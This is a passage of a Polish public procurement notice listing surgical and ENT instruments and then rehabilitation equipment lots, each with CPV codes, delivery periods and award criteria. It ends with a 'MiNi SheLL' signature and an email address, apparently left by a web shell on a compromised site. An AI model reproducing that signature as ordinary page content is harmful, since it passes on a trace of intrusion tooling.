21.	Nożyczki chirurgiczne, proste, dł. 145 mm, tępe końce	szt.	2;
22.	Klem okienkowy (kleszczyki gąbczaste) zakrzywione, dł. 180 mm	szt.	1;
23.	Hak 1- zębny do skóry, plastyczny, dł. 180 mm	szt.	1;
24.	Pinceta delikatna, anatomiczna, prosta, chirurgiczna, plastyczna, dł. 150 - 155 mm	szt.	1;
25.	Miska mała, stalowa, pojemność 0,14 litra, wymiary 80x40 mm	szt.	1;
26.	Hak ostry 1 -zębny 130 mm	szt.	3;
27.	Haczyk do skóry duży 180 mm	szt.	3;
28.	Pinceta chirurgiczna 1 x 2 ząbki dł. 140-145 mm	szt.	4;
29.	Pinceta chirurgiczna 1 x 2 ząbki dł. 130 mm	szt.	1;
30.	Nożyczki preparacyjne, zakrzywione, dł. 150 mm	szt.	1;
31.	Nożyczki chirurgiczne, proste, końce tępe, dł. 140-145 mm	szt.	1;
32.	Wziernik nosowy, dł. 130 mm, złącze rozbieralne, dł. trąbki 90 mm	szt.	2;
33.	Wziernik nosowy, dł. 130 mm, złącze rozbieralne, dł. trąbki 50 mm	szt.	1;
34.	Wziernik nosowy, dł. 130 mm, złącze rozbieralne, dł. trąbki 75 mm	szt.	1;
35.	Kleszcze do kości sitowej, branże tnące, proste śr. 4,0 mm, długość części pracującej do uchwytu 120mm	szt.	1;
36.	Kleszcze do kości sitowej, zakrzywione w górę 40 stopni, szerokość 4,00 mm, dł. 120, średnica 3,5mm 	szt.	1;
37.	Kleszcze do kości sitowej, branże tnące odgięte kąt 130 stopni, średnica 3mm, dł. części pracującej do uchwytu 120mm 	szt.	1;
38.	Kleszczyki nosowe, obłe ostrotnące 5x18mm, dł. 170 mm	szt.	1;
39.	Pinceta bagnetowa, dł. 200mm, kończysta, zakrzywiona	szt.	2;
40.	Pętla do polipów nosa, dł. 260mm	szt.	1;
41.	Trokar antralny, średnica 1,8mm (igła z mandarynem)	szt.	1;
42.	Szpatułka językowa 64mm	szt.	1;
43.	Kaniula ssąca z mandarynem, zakrzywiona, śr. 3,00mm, dł. krzywizny 110mm	szt.	1;
44.	Hak półostry 3x 4- zęby dł. 110 mm	szt.	1;
45.	Imadło z delikatnym pyszczkiem dł. 150mm	szt.	1;
46.	Imadło chirurgiczne dł. 150mm, z twardą wkładką szczęki, delikatne nacięcia krzyżowe	szt.	1;
47.	Kleszczyki naczyniowe, zakrzywione, przerwane ucho, dł. 190mm	szt.	2;
48.	Kleszczyki naczyniowe, delikatne bez ząbka, odgięte dł. 125mm, moskitki	szt.	5;
49.	Pinceta anatomiczna, plastyczna dł. 150mm	szt.	2;
50.	Haczyk żylny typ Varady dł. 170 - 180mm 	szt.	2;
51.	Sonda rowkowa	szt.	4;
Narzędzia medyczne oraz wielorazowy sprzęt medyczny fabrycznie nowe, rok produkcji 2016.					
Narzędzia medyczne wielorazowe.					
Narzędzie medyczne oraz wielorazowy sprzęt medyczny przeznaczone do sterylizacji.					
Gwarancja na narzędzie medyczne i wyroby medyczne min. 12 m-cy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1, 33.16.90.00-2, 33.16.22.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin dostawy - 10</li>
<li>3. Termin płatności - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> PAKIET NR 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Zegarek zabiegowy - minutnik, na baterie, zakres min. 60 minut	szt.	6.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.52.10.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin dostawy - 10</li>
<li>3. Termin płatności - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> PAKIET NR 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Poduszka sensomotoryczna z kolcami, okrągła	szt.	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.44.00.00-4, 33.15.00.00-6, 37.44.10.00-1, 37.44.19.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin dostawy - 10</li>
<li>3. Termin płatności - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> PAKIET NR 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Poduszka sensomotoryczna bez kolców, okrągła	szt.	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.44.00.00-4, 33.15.00.00-6, 37.44.10.00-1, 37.44.19.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin dostawy - 10</li>
<li>3. Termin płatności - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> PAKIET NR 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Elastyczna taśma do ćwiczeń, długość 2,5 m. Kolor: czerwony - 2 szt., zielony - 1 szt., niebieski - 2 szt., czarny - 1 szt., złoty /żółty - 2 szt.; 	łącznie szt.	8;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.44.00.00-4, 33.15.00.00-6, 37.44.10.00-1, 37.44.19.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin dostawy - 10</li>
<li>3. Termin płatności - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> PAKIET NR 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Podest równowagi, podstawa sferyczna, okrągła	szt.	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.44.00.00-4, 33.15.00.00-6, 37.42.60.00-0, 37.44.10.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin dostawy - 10</li>
<li>3. Termin płatności - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> PAKIET NR 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Wielofunkcyjny przybór stosowany w treningu sensomotorycznym, ćwiczeniach koordynacyjnych, korekcji wad postawy oraz ćwiczeniach mających na celu przyrost siły mięśniowej. Dwie niezależne komory wypełnione powietrzem i wyposażone w zaworki pozwalające na regulację elastyczności przyboru w celu dopasowania stopnia trudności do możliwości i potrzeb ćwiczącego. Wymiary: długość 46cm, szerokość 32 cm, wysokość 8cm. Przybór typu Aero Step lub równoważny. 	szt.	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.44.00.00-4, 33.15.00.00-6, 37.44.10.00-1, 37.44.19.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin dostawy - 10</li>
<li>3. Termin płatności - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> PAKIET NR 8.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Piłka dla dorosłych typu Octositz (ośmiorniczka) lub równoważna. Kolor zielony. Wymiary 60-65 cm	szt.	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.44.00.00-4, 33.15.00.00-6, 37.44.10.00-1, 37.44.19.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin dostawy - 10</li>
<li>3. Termin płatności - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> PAKIET NR 9.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Ringo sensoryczne, zielone, średnica 18 cm	szt.	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.44.00.00-4, 33.15.00.00-6, 37.44.10.00-1, 37.44.19.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin dostawy - 10</li>
<li>3. Termin płatności - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> PAKIET NR 10.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Jeże balansowe z miękkimi wypustkami sensorycznymi (1 para) i figurami geometrycznymi (1 para), średnica 16 cm (1 para) i 18 cm (1 para); łącznie 	2
pary;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.44.00.00-4, 33.15.00.00-6, 37.44.10.00-1, 37.44.19.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin dostawy - 10</li>
<li>3. Termin płatności - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> PAKIET NR 11.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Piłka do ćwiczeń, średnica 65 cm. Piłki wykonane z tworzywa PCV odpornego na wybuchy wytrzymującego obciążenie dynamiczne do 300 kg. Różne kolory.	szt.	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.44.17.00-8, 37.44.00.00-4, 33.15.00.00-6, 37.44.10.00-1, 37.44.19.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin dostawy - 10</li>
<li>3. Termin płatności - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> PAKIET NR 12.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Mata korekcyjno - masująca - jeżyk, wymiar 100-30 cm	szt.	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.44.00.00-4, 33.15.00.00-6, 37.44.10.00-1, 37.44.19.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin dostawy - 10</li>
<li>3. Termin płatności - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com